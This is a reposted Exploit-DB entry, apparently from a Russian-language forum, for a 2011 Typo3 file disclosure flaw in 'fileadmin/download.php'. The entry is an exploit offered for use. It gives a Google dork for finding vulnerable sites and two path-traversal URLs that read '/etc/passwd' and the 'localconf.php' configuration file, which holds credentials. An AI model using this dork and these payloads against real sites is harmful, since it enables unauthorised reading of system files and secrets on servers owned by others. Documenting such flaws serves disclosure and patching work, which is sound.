- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 17905
- Проверка EDB
-
- Пройдено
- Автор
- NUMBER 7
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- null
- Дата публикации
- 2011-09-29
Код:
________________________________________________________________________________________
| _ _ |
| ||\\ || || || | \\ // | ____ ________ __________ |
| || \\ || || || | |\\ //| | | \ | ______| |_______/ / |
| || \\ || || || | | \\ // | | | _ \ | | / / |
| || \\ || || || | | \\ // | | | |_) | | |______ /\`'__\ / / |
| || \\ || || || | | \\ // | | | _ < | ______| \ \ \/ / / |
| || \\ || ||_______|| | | \\// | | | |_) | | |______ \ \_\ / / |
| || \\|| |_________| |_| \/ |_| |_____/ |________| \/_/ /_/ |
|_________________________________________________________________________________________|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Exploit Title: [Typo3 File Disclosure]
# Google Dork: [inurl:"/fileadmin/download.php?Fichier_a_telecharger=*"]
# Date: [29/09/2011]
# Author: [Number 7]
# Contact :spam[-]tn[.]cs[@]live[.]fr
# Software Link: [http://typo3.org/]
# Tested on: [linux]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://127.0.0.1/fileadmin/download.php?Fichier_a_telecharger=../../../../../etc/passwd
http://localhost/path/fileadmin/download.php?Fichier_a_telecharger=../typo3conf/localconf.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Made In Tunisia // Kairouan // Mansoura City :D
- Источник
- www.exploit-db.com